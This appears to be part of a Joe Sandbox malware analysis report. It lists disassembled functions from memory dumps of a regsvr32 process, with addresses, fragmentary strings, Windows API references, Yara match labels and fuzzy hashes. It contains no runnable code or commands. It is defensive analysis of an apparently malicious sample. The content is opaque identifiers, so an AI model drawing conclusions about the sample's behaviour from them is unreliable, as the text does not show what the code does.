Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: R$)H8$?rIc$L==$V
API String ID: 0-2512384441
Opcode ID: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
Instruction ID: 6f6f9af97a41f07aad9f9d1cbd67af5334817a93c453241fb2a5d498ae2065c2
Opcode Fuzzy Hash: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
Instruction Fuzzy Hash: 3541D0B090074E8BCF48CF64D49A5DE7FB0FB68398F20421DE856A6250D3B896A5CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800119A8 Relevance: 6.3, Strings: 5, Instructions: 63COMMON

Download Yara Rule

Strings

+, xrefs: 00000001800119DA
S, xrefs: 0000000180011A92
bt, xrefs: 0000000180011A1E
Qq, xrefs: 0000000180011A84
vird, xrefs: 00000001800119C2

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Qq$bt$vird$+$S
API String ID: 0-3373980505
Opcode ID: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
Instruction ID: 8c34661c01ca41a1498f33dadfb9b2381b3c020394efcb6cfebc1cbd8490f91c
Opcode Fuzzy Hash: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
Instruction Fuzzy Hash: 8831C2B081038A8FDB45CF64C88A5DE7BF0FB58358F115A19F869A6250D3B4D668CF81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7EC450 Relevance: 6.2, APIs: 4, Instructions: 152COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 00007FF8CB7EC477
GetLocaleInfoA.KERNEL32 ref: 00007FF8CB7EC4AC
GetLocaleInfoA.KERNEL32 ref: 00007FF8CB7EC504
GetLocaleInfoA.KERNEL32 ref: 00007FF8CB7EC5F8

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: InfoLocale$_getptd
String ID:
API String ID: 1743167714-0
Opcode ID: b0fda2b9e43f1133ad190798799e4c2ffbba67a865a56d93994de7f284044248
Instruction ID: ef8246343a8f6fd1cad50f3223d597789fd9698da859a50496a47dd1244c1566
Opcode Fuzzy Hash: b0fda2b9e43f1133ad190798799e4c2ffbba67a865a56d93994de7f284044248
Instruction Fuzzy Hash: E4615D76B08BD69BEA689E62D9443E97391FB88385F140136DB1D872B4CF3CE5648701

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180011AD0 Relevance: 5.3, Strings: 4, Instructions: 335COMMON

Download Yara Rule

Strings

^_", xrefs: 0000000180011D6E
@, xrefs: 0000000180011F6B
P9, xrefs: 0000000180011DC0
V, xrefs: 0000000180011B81

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: V$@$P9$^_"
API String ID: 0-1880944046
Opcode ID: 6e4761af9cbbc7e56b0ebe3f2fd9ebbf1bb807a40d07775ef569cdf1f58d0d70
Instruction ID: ef3f81825b514374c5d287d432cdf068934c0dc0259921085eace1de493a05f6
Opcode Fuzzy Hash: 6e4761af9cbbc7e56b0ebe3f2fd9ebbf1bb807a40d07775ef569cdf1f58d0d70
Instruction Fuzzy Hash: B6F1DF70504749EFCB98CF28D18AACE7BE0FB48348F50812AF81A9B264D770DA59DB45

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800132F0 Relevance: 5.3, Strings: 4, Instructions: 312COMMON

Download Yara Rule

Strings

b/, xrefs: 000000018001347F
syG, xrefs: 000000018001339D
=_, xrefs: 00000001800136EB
F)k, xrefs: 000000018001336C

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: =_$F)k$b/$syG
API String ID: 0-3955183656
Opcode ID: 8e62bb2442717ef834bc9e0d2db0d031a8489eaa3450fb87a3fdc8a088d62545
Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
Opcode Fuzzy Hash: 8e62bb2442717ef834bc9e0d2db0d031a8489eaa3450fb87a3fdc8a088d62545
Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002D70 Relevance: 5.3, Strings: 4, Instructions: 266COMMON

Download Yara Rule

Strings

vG, xrefs: 000000018000316F
'Xsa, xrefs: 0000000180002EA2
#X, xrefs: 0000000180002E74
iJ6, xrefs: 0000000180003091

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #X$'Xsa$iJ6$vG
API String ID: 0-746338152
Opcode ID: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
Instruction ID: 8ba50615c78112980223cca8f04f1fa67c4b69ee5a809e4e0bd2b8ae6832a1bb
Opcode Fuzzy Hash: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
Instruction Fuzzy Hash: 93E154B590070DDFCB88DF68D19A9DD7BB9BB49308F404029FC0E9A264D3B4E919CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800097C0 Relevance: 5.3, Strings: 4, Instructions: 257COMMON

Download Yara Rule

Strings

*i^, xrefs: 0000000180009A7A
-Z, xrefs: 0000000180009D06
]2, xrefs: 0000000180009CC2
MIC, xrefs: 0000000180009BF0

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: *i^$MIC$-Z$]2
API String ID: 0-498664264
Opcode ID: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
Instruction ID: 9792ecb135b2155067e966d5e38dbf4f409fde80c29e70d57d2078ebe1ce15c6
Opcode Fuzzy Hash: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
Instruction Fuzzy Hash: 10E1C670109B888FDBF8DF64CC86BEB7BA5FB44346F10651DD84A8A290DBB46645CF41

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180027F9C Relevance: 5.2, Strings: 4, Instructions: 237COMMON

Download Yara Rule

Strings

?, xrefs: 0000000180027FC1
LsRW, xrefs: 000000018002820A
>97", xrefs: 0000000180028161
~x, xrefs: 0000000180028423

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: >97"$?$LsRW$~x
API String ID: 0-2554301858
Opcode ID: b37088c51263af6e06ebf62d89f1bff1b13e76a95d3b3fa096a3ef4bda325288
Instruction ID: eb38a845d203af82144c13b3f151f5fa827cd0cb8678597ee03ac1a376820114
Opcode Fuzzy Hash: b37088c51263af6e06ebf62d89f1bff1b13e76a95d3b3fa096a3ef4bda325288
Instruction Fuzzy Hash: E1D1E7705067C8CBEBBADFA4D885BCD3BA8FB44744F106219EC4AEA250DB745749CB01

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180010758 Relevance: 5.2, Strings: 4, Instructions: 222COMMON

Download Yara Rule

Strings

EG, xrefs: 000000018001082C
B, xrefs: 0000000180010AEC
_, xrefs: 0000000180010A56
QsF, xrefs: 0000000180010894

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: B$EG$QsF$_
API String ID: 0-784369960
Opcode ID: 044ffeba6cf6caf628ab0d946c02a3f7d28cd574b6d4e2350068ec5c70ab2904
Instruction ID: 62dbbc71664ee0946fffbba3b71afe09b12d9ffe0d1744d6deb9db65ff0cd9cc
Opcode Fuzzy Hash: 044ffeba6cf6caf628ab0d946c02a3f7d28cd574b6d4e2350068ec5c70ab2904
Instruction Fuzzy Hash: 3FB1387010468D8FDF88DF28C88A6DA3FA1FB68388F614219FC4A97250C778D694CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180020334 Relevance: 5.2, Strings: 4, Instructions: 190COMMON

Download Yara Rule

Strings

-`G, xrefs: 00000001800206A2
Z`35, xrefs: 00000001800205D3
5B.Y, xrefs: 000000018002045A
., xrefs: 00000001800206DC

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: -`G$.$5B.Y$Z`35
API String ID: 0-1363032466
Opcode ID: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
Instruction ID: b244d414363a4385de25ad5610b22aaac7fb2f2c92cf8150697ad32e565f4bd8
Opcode Fuzzy Hash: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
Instruction Fuzzy Hash: 29A1FB716157888FEB7ADF24C89A7CE7BE1FB49308F40461DD98E8A250D7B49609CB42

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000EE98 Relevance: 5.2, Strings: 4, Instructions: 167COMMON

Download Yara Rule

Strings

\O, xrefs: 000000018000F046
#o, xrefs: 000000018000EFD8
*+_, xrefs: 000000018000EF25
WSh, xrefs: 000000018000EEF0

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: *+_$WSh$\O$#o
API String ID: 0-1846314129
Opcode ID: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
Instruction ID: 175ce4bc0e22c7a636d32034be2bbb8ad42f6b3cb6a748f64f507b7f0b29ed37
Opcode Fuzzy Hash: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
Instruction Fuzzy Hash: 1971167160474ECFCB98DF18C489ADA3BE1FB58318F414529FC09A7264DB74DAA8CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180024D80 Relevance: 5.2, Strings: 4, Instructions: 155COMMON

Download Yara Rule

Strings

M*K, xrefs: 0000000180024E36
O, xrefs: 0000000180024F9B
.B, xrefs: 0000000180025032
\<, xrefs: 0000000180024E9B

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: .B$O$M*K$\<
API String ID: 0-3225238681
Opcode ID: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
Instruction ID: 95d2fbb8f7fe970b1359d27f41ccd6aad584115d4fee043204e0c0f4c3f3b287
Opcode Fuzzy Hash: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
Instruction Fuzzy Hash: 7181E370549788CFEBBACF24C886BDE7BE4FB48744F20461DE85A8A260DB709645CF41

Uniqueness

Uniqueness Score: -1.00%

Function 000000018002A42C Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

~O, xrefs: 000000018002A626
$, xrefs: 000000018002A454
xVO, xrefs: 000000018002A587
$, xrefs: 000000018002A477

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $$$$xVO$~O
API String ID: 0-3655128719
Opcode ID: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
Instruction ID: 8f78542db34460f4381821bab2b7e4f68a699ed7f8b2fc47c959991f0b02677a
Opcode Fuzzy Hash: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
Instruction Fuzzy Hash: 5B61D1B05187448FD369DF28C18965BBBF1FBC6744F008A1EF6868A260DB76D948CB47

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800024B8 Relevance: 5.1, Strings: 4, Instructions: 79COMMON

Download Yara Rule

Strings

JMg, xrefs: 000000018000252F
,IW, xrefs: 0000000180002565
G, xrefs: 0000000180002557
l, xrefs: 0000000180002548

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ,IW$G$JMg$l
API String ID: 0-1370644289
Opcode ID: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
Instruction ID: 7fb8b97fd43ed4dc52a467cdcf5cca41e6e56dbc92574a5c866222c6b731b82a
Opcode Fuzzy Hash: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
Instruction Fuzzy Hash: 0A41D3B190074E8FCB48CF64C88A5DE7FB0FB18358F10461EE85AA6250D7B89695CFC9

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7EAF70 Relevance: 4.9, APIs: 3, Instructions: 435COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF8CB7EB009
_errno.LIBCMT ref: 00007FF8CB7EB293
__tzset.LIBCMT ref: 00007FF8CB7EB489

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: _errno$__tzset
String ID:
API String ID: 3587134695-0
Opcode ID: 49cb08095e24ca39ac522c7ec604242f23efb3d68850c8b05a0144016971d7f9
Instruction ID: c42cee227ebcba768a3726691173856a254db01337786d340ef2acf87a4278a8
Opcode Fuzzy Hash: 49cb08095e24ca39ac522c7ec604242f23efb3d68850c8b05a0144016971d7f9
Instruction Fuzzy Hash: 7D026232A08BE28BE7658EAA90D013D2B91EF847C5F24443ADF4E567F5DE38F5448701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7EFB6C Relevance: 4.6, APIs: 3, Instructions: 95COMMON

Download Yara Rule

APIs

_lock.LIBCMT ref: 00007FF8CB7EFB92
_errno.LIBCMT ref: 00007FF8CB7EFBA4

Part of subcall function 00007FF8CB7E66D8: DecodePointer.KERNEL32 ref: 00007FF8CB7E66FF

_errno.LIBCMT ref: 00007FF8CB7EFBF0

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: _errno$DecodePointer_lock
String ID:
API String ID: 2175075375-0
Opcode ID: 67eb2a1810ee8ae3a6f200ab40374a5628c10f79bc737fdb0890b88123cf569c
Instruction ID: 1dfa1ae35ae75a8e9b31e35e297f6dbed0467e44cfb78e3ea2a684fd2d6cdd5f
Opcode Fuzzy Hash: 67eb2a1810ee8ae3a6f200ab40374a5628c10f79bc737fdb0890b88123cf569c
Instruction Fuzzy Hash: 8F317E21B0CFA34BFF659E73955537A61919F643C4F144035EE4D8AEF5DE2CE8018600

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7ED318 Relevance: 4.5, APIs: 3, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF8CB7ED357
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF8CB7ED39D
UnhandledExceptionFilter.KERNEL32 ref: 00007FF8CB7ED3A8

Part of subcall function 00007FF8CB7E6F0C: GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FF8CB7E7194,?,?,?,?,00007FF8CB7E6C69,?,?,00000000,00007FF8CB7E30C0), ref: 00007FF8CB7E6FCF

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextFileModuleName
String ID:
API String ID: 2731829486-0
Opcode ID: 593c6449df1015ae3e331ed563d16e9abc9156b94907c07056c7b3d83921dabb
Instruction ID: 2d6dce206f5120fd63312f2d5c63ad4fe6df223e423468b7e8db706724bd4ee6
Opcode Fuzzy Hash: 593c6449df1015ae3e331ed563d16e9abc9156b94907c07056c7b3d83921dabb
Instruction Fuzzy Hash: C3114226628FA687E7249F52E4543BA63A1FF85384F440135EE4D06BB5DF2DE405CB05

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001496C Relevance: 4.2, Strings: 3, Instructions: 493COMMON

Download Yara Rule

Strings

*4, xrefs: 0000000180014A1B
5F, xrefs: 0000000180014AA5
S^r, xrefs: 0000000180014FB9

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: *4$5F$S^r
API String ID: 0-3556444313
Opcode ID: 32f12f089b8a2f529f06453d9d247e753f5514636137a2d7872eb14875660eb0
Instruction ID: 3ee7e47d854a132278560872cba22db18b0762c6b33e49020313469b2ebed1ad
Opcode Fuzzy Hash: 32f12f089b8a2f529f06453d9d247e753f5514636137a2d7872eb14875660eb0
Instruction Fuzzy Hash: 5542F87154478C8BDBB8CF28C88D7DE7BE0FB54344F20461DE9AA8A261DBB49685CF41

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001BB04 Relevance: 4.0, Strings: 3, Instructions: 286COMMON

Download Yara Rule

Strings

<x<, xrefs: 000000018001BED4
&lz2, xrefs: 000000018001BE19
'~W, xrefs: 000000018001BEA8

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: &lz2$'~W$<x<
API String ID: 0-2268522332
Opcode ID: d353bb3380a978666a479ee450a37b931469c1cc25af52acd29372fd61dce81c
Instruction ID: 36e71a14450f7168630c03d0025ff7d4b6ed06a40f4a953d8196177a15a51c97
Opcode Fuzzy Hash: d353bb3380a978666a479ee450a37b931469c1cc25af52acd29372fd61dce81c
Instruction Fuzzy Hash: 47E10574A14B0C8BDB69DFB8D04A6CDBBF2FB54344F20411DE80AAB292D7B49519CF85

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000BDD0 Relevance: 4.0, Strings: 3, Instructions: 262COMMON

Download Yara Rule

Strings

o6., xrefs: 000000018000BFE9
{Fl&, xrefs: 000000018000C123
s8Q, xrefs: 000000018000C31F

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: o6.$s8Q${Fl&
API String ID: 0-2665016659
Opcode ID: 511a0316ce8a18d61ca04810737b4ff370b750d3f2d96c2fe29b5a7c249dfd58
Instruction ID: 345269621f88c341702fdf3610a73dbdf39058324611beb6fba665c489d4de0b
Opcode Fuzzy Hash: 511a0316ce8a18d61ca04810737b4ff370b750d3f2d96c2fe29b5a7c249dfd58
Instruction Fuzzy Hash: 48E1D7705087C88BDBFEDF64C88A7DA7BACFB44708F105219EA4A8E258DB745749CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180020768 Relevance: 4.0, Strings: 3, Instructions: 260COMMON

Download Yara Rule

Strings

T]0, xrefs: 00000001800209FC
ba^2, xrefs: 0000000180020A27
$, xrefs: 0000000180020AED

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $$T]0$ba^2
API String ID: 0-1276948933
Opcode ID: 50dab8274baf4b038fc4b99f186c2c7516c76bbdb2714b9ce32fb6facc3b6c7a
Instruction ID: eef8b44dd2583dc88dd368a4c81b8d58a3d6fa2c6a2b719c97d70d037daa09dd
Opcode Fuzzy Hash: 50dab8274baf4b038fc4b99f186c2c7516c76bbdb2714b9ce32fb6facc3b6c7a
Instruction Fuzzy Hash: 1CD11470510748DBCB99CF24C88AADD7FB1FB483A8FA42219FD06A7260C775D984CB85

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001D49C Relevance: 4.0, Strings: 3, Instructions: 228COMMON

Download Yara Rule

Strings

EDO, xrefs: 000000018001D752
V , xrefs: 000000018001D544
6w5*, xrefs: 000000018001D7AF

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 6w5*$EDO$V
API String ID: 0-1640223502
Opcode ID: 944acd662e311639990576df567dfaf1aeae203cd7960374855798ea7e62004e
Instruction ID: 2aad62a72125add12bf3ce521e9508149cfd3cbf44ea5784fb3c25a9d2cdfef8
Opcode Fuzzy Hash: 944acd662e311639990576df567dfaf1aeae203cd7960374855798ea7e62004e
Instruction Fuzzy Hash: 07B1E67160560ECFCB88DF28C5866DE3BE0FB48318F41422AF90AA7354D774DA68CB85

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000A6EC Relevance: 4.0, Strings: 3, Instructions: 212COMMON

Download Yara Rule

Strings

Y(), xrefs: 000000018000A773
|Y, xrefs: 000000018000AB17
i_"o, xrefs: 000000018000AB62

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Y()$i_"o$|Y
API String ID: 0-942011364
Opcode ID: 99e19844c70b9c0f3275fee4d9e8598d8799ff7d5c60b779fef480da3ab0ff5c
Instruction ID: 0f698cdcb9f5af38e2ff44253ec0ac71ef144d8643f40abc7fb7ff20982184b6
Opcode Fuzzy Hash: 99e19844c70b9c0f3275fee4d9e8598d8799ff7d5c60b779fef480da3ab0ff5c
Instruction Fuzzy Hash: 5AC1F7706083889FDBBEDF28C8857CA7BA9FB46708F504519EDC98E254DB745744CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180017378 Relevance: 3.9, Strings: 3, Instructions: 183COMMON

Download Yara Rule

Strings

-, xrefs: 00000001800174FF
O), xrefs: 0000000180017436
,G, xrefs: 000000018001749E

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: O)$,G$-
API String ID: 0-23008916
Opcode ID: 382f6eb2118395d632dba3a2cf122cd3a475215dc83456f13dd86c7c3519a1e5
Instruction ID: 8302e34eee3504d26b36c965fbed976e69713b67a0f5c478fb5ffa9ec871fbb1
Opcode Fuzzy Hash: 382f6eb2118395d632dba3a2cf122cd3a475215dc83456f13dd86c7c3519a1e5
Instruction Fuzzy Hash: 6E81F7705106499BCF88DF28C8D6ADD7FB1FB483A8F956219FD0AA6250C774D885CB84

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000A270 Relevance: 3.9, Strings: 3, Instructions: 158COMMON

Download Yara Rule

Strings

;U[, xrefs: 000000018000A476
L, xrefs: 000000018000A3C5
Q#, xrefs: 000000018000A498

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ;U[$L$Q#
API String ID: 0-2933747092
Opcode ID: 48c80cf55519f04e9394a4cd7563c786fdb29e452e8ba8fdd2d4b1674bf817ce
Instruction ID: c6ef39cbec2f0f72f24e8f037401308b0178ea645a608ff4f3f67d7bb634a9bb
Opcode Fuzzy Hash: 48c80cf55519f04e9394a4cd7563c786fdb29e452e8ba8fdd2d4b1674bf817ce
Instruction Fuzzy Hash: 0B614E70A0870CAFDB48DF94C14AADDBBF2FB54344F0081A9E806AB251D7B59B59CB85

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001DFB4 Relevance: 3.9, Strings: 3, Instructions: 144COMMON

Download Yara Rule

Strings

5(, xrefs: 000000018001E16D
qwX, xrefs: 000000018001E11A
<:*, xrefs: 000000018001E0BA

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 5($<:*$qwX
API String ID: 0-3944236288
Opcode ID: 3ff6daddd3fc5570497b4afa6ac41a8054238f95a4c1d79c70cc8b829639e233
Instruction ID: 7f83292775578326f1885df61e48a3f2c5c3ff73894a37d4b388f2926162ec41
Opcode Fuzzy Hash: 3ff6daddd3fc5570497b4afa6ac41a8054238f95a4c1d79c70cc8b829639e233
Instruction Fuzzy Hash: 5B71067015878CDBEBBADF24C8897DD3BB0FB49344F90861AE84E8A250CF74574A9B41

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001C05C Relevance: 3.9, Strings: 3, Instructions: 135COMMON

Download Yara Rule

Strings

v;, xrefs: 000000018001C13F
s`~, xrefs: 000000018001C1CE
79&, xrefs: 000000018001C10D

Memory Dump Source

